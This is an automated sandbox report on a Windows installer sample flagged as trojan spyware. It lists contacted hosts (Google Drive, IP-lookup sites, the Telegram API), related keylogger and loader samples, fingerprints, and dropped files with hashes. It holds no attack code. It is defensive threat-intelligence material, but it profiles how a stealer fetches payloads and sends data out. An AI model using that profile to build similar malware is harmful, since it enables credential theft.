https://drive.usercontent.google.com/	WGi85dsMNp.exe, 00000002.00000003.2263229811.0000000002707000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.000000000271F000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002706000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D34000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	WGi85dsMNp.exe	false	high
http://api.telegram.org	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032CC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588318
Start date and time:	2025-01-11 00:03:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WGi85dsMNp.exe renamed because original name is a hash value
Original Sample Name:	5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 150 Number of non-executed functions: 117
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
104.21.16.1	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
193.122.130.0	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VQsnGWaNi5.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lsc5QN46NH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	B3aqD8srjF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	bd9Gvqt6AK.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Salary Payment Information Discrepancy_pdf.pif.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
api.telegram.org	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Gz2FxKx2cM.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
ORACLE-BMC-31898US	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	TVPfW4WUdj.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 172.217.16.193
	WtZl31OLfA.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.186.78 172.217.16.193
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.78 172.217.16.193
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.186.78 172.217.16.193
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.78 172.217.16.193
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.78 172.217.16.193
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.78 172.217.16.193
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.78 172.217.16.193
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.186.78 172.217.16.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	V7OHj6ISEo.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
Category:	dropped
Size (bytes):	484658
Entropy (8bit):	7.809711763657168
Encrypted:	false
SSDEEP:	12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
MD5:	5C727AE28F0DECF497FBB092BAE01B4E
SHA1:	AADE364AE8C2C91C6F59F85711B53078FB0763B7
SHA-256:	77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
SHA-512:	5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"

C:\Users\user\AppData\Local\Iw\Concinnate46.Ove

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	data
Category:	dropped
Size (bytes):	265451
Entropy (8bit):	7.782402940724189
Encrypted:	false
SSDEEP:	3072:MfD0sueIxWjINar/W+7HQEr2h68AS/58b3Pxlo4th+1rpu+MHr+yOvAYYR36Dbs:uTyD+7wEyzizP/o6hCtMHr+D/YR3b
MD5:	0086A4711D718152A54D75819B459A34
SHA1:	E2DC6C0ABE6C7F59801B94B5BA3337597FFC8D69
SHA-256:	746807F1588B3611FF5B28451BDFDB07FAE73CD2F0D5502C44D7A9D0C8667C0F
SHA-512:	166D1A46B2A96E6B9183265CB01893EBB45CE65B35625F3EA71BC9918BCE2BBE19277231E5112E5B06A038375FA1B6F6D2E1564FBEC93269F11C57DCB7A04417
Malicious:	false
Reputation:	low
Preview:	......................!.////..=..........\|..........xxx......K..II......................r........^^...........................m..................?...................nn........A.%%%..AA.....33..\\\\\...p.CCC...........................7...F...6....3333....\|..........88...... ..8.............................<<...............,,....e../..0..y......~~.....................................r..-...xxx.........4..............NNNNN...HH.\|\|.....-..........q...............................................u...ff..7..>.....VV...............`..........77........gggggggg.AA....................ooooo.M......ss.X.9..........N........KK.QQ............*...III................[[...........\|................................m.........\..........,..................".mm.EE.......rr....7.............\|\|.......OO..............//.....qq...........ll....l..l.......W............ .............]]]]]]......................DDDDDDDDD...........6.wwwww..KK.................P...................]]..```````......hhh...........a.A

C:\Users\user\AppData\Local\Iw\Unnumberable\Kbmandsskole.str

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	data
Category:	dropped
Size (bytes):	112291
Entropy (8bit):	1.249420131631438
Encrypted:	false
SSDEEP:	768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
MD5:	4D1D72CFC5940B09DFBD7B65916F532E
SHA1:	30A45798B534842002B103A36A3B907063F8A96C
SHA-256:	479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
SHA-512:	048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........P............+......................................................................................................................X......n..(................G...................................m.........\|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................

C:\Users\user\AppData\Local\Iw\Unnumberable\Sensuousnesses.opk

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	data
Category:	dropped
Size (bytes):	362089
Entropy (8bit):	1.23992084267325
Encrypted:	false
SSDEEP:	768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
MD5:	A4340182CDDD2EC1F1480360218343F9
SHA1:	50EF929FEA713AA6FCC05E8B75F497B7946B285B
SHA-256:	B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
SHA-512:	021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......\|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............

C:\Users\user\AppData\Local\Iw\Unnumberable\prepares.pli

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
Category:	dropped
Size (bytes):	139354
Entropy (8bit):	1.2473328695625903
Encrypted:	false
SSDEEP:	768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
MD5:	B0FB6B583D6902DE58E1202D12BA4832
SHA1:	7F585B5C3A4581CE76E373C78A6513F157B20480
SHA-256:	E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
SHA-512:	E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
Malicious:	false
Preview:	.......................................\|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........

C:\Users\user\AppData\Local\Iw\Unnumberable\sdelighedsforbrydelses.Kan

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	data
Category:	dropped
Size (bytes):	29109
Entropy (8bit):	4.571452088399361
Encrypted:	false
SSDEEP:	384:NAaDWUweT7xl/UzbAZX2iGjoGdjtjc0bItS4GDyIEN3+nMTrXAw2KvZ6YHx8KM/Z:NT1zMsGiGLK0bItS12lrnxHx8K0ku
MD5:	88F751E865173E78E89A78BAE34FD3D3
SHA1:	67825D4FBC5C0B462DAD04668080272D0E20D31B
SHA-256:	CD32E850C8641C3C2CB2AB071F82651261E4B08B26C045DE2964C2C099793866
SHA-512:	73445E8D885AFB4DF8D2169304035845D92DF4D0B053BBF3B9894D5E7E732AC8378EEAE215B8F0AFE22823823389091377FA0EC3895304B280A8C29589D59BAB
Malicious:	false
Preview:	.........vvvvv..SS..........................$$................66.................(...F............................88.!!!.........M.....................................ppp.'......,.j....B.........H.......................HH...._..........V......=...>........___.D.......888.m.ee.....uu......+....$..&&.....I...........ff.,......P.....22...............@@....////.uuu....V...ppppp.VV.oo.....}}}}}.EEE.d...>>>>..~~.S..................KKK.xx.......zz........Z.66......_...........V...M.....ii......#.........!!!!!!!!!.bbb....................?.)....xxx.EE......................................................s.....(((...............................U...................................www....44..........PP..........III.......YY.......BB.....................OO....................DDD....===.....}}......i........................................A......................??..................i.......EE..............Q.....R......o...bb..............\|\|\|..........................................n..N.h.........i..

C:\Users\user\AppData\Local\Temp\nsdC34C.tmp

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	data
Category:	dropped
Size (bytes):	1419231
Entropy (8bit):	5.474882951664024
Encrypted:	false
SSDEEP:	12288:DTyD+pL/bfcgq1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DQZ2:/yD0L/bfEo3xX3y4bz2lWwWo6rSTZy/
MD5:	F7D9F967CA2F71E3D562937FCB24C382
SHA1:	C16A775DD27444712E51E969C48B92A59BC30A42
SHA-256:	FC404818413612BDF92C72AB1F5EB9CC32D86D9D30D127C4D4E0114D70620B45
SHA-512:	9B448617B9A58A5F43B87165EE37BD36D2FEFEEA025E8173C00E33BCA4C0B0B0C66C765281FABEAC0857FEC2073940E021E4D0256144555DF784E91DF4A54073
Malicious:	false
Preview:	.6......,.......,.......\........!......:5......86..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\WGi85dsMNp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: czHx16QwGQ.exe, Detection: malicious, Browse Filename: rXKfKM0T49.exe, Detection: malicious, Browse Filename: b5BQbAhwVD.exe, Detection: malicious, Browse Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse Filename: V7OHj6ISEo.exe, Detection: malicious, Browse Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse Filename: 6mGpn6kupm.exe, Detection: malicious, Browse Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.957075213429238
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WGi85dsMNp.exe
File size:	979'348 bytes
MD5:	2275024102505f0997f027c71970750d
SHA1:	10a4feb8f216f86caa840ff85ba02c85e00e8665
SHA256:	5fd6c5f71c6fdda582775fa5822b5ed0af1e5dc9431c06d453752a6bcbbe359a
SHA512:	1ebf7e71b121a3102d2de3c756761fe7e2efae90b2561912886da7d8a43fe9fcf29322d5f239cd21614847d9ec3c519b2d2a1213252cf3e1ee5dc622d4e24182
SSDEEP:	24576:9jwKCNRVJ13mzBqtejjs3RgG9vWciasTKafa0aULP:V1CLFyqtukfiaJaCUP
TLSH:	C725234A5772CCA7D8164871962BCCA7B6B57E0238946ED353C0AB0F3CB131B4D29F99
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

File Icon


Icon Hash:	46224e4c19391d03

Static PE Info

General

Entrypoint:	0x4034a5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
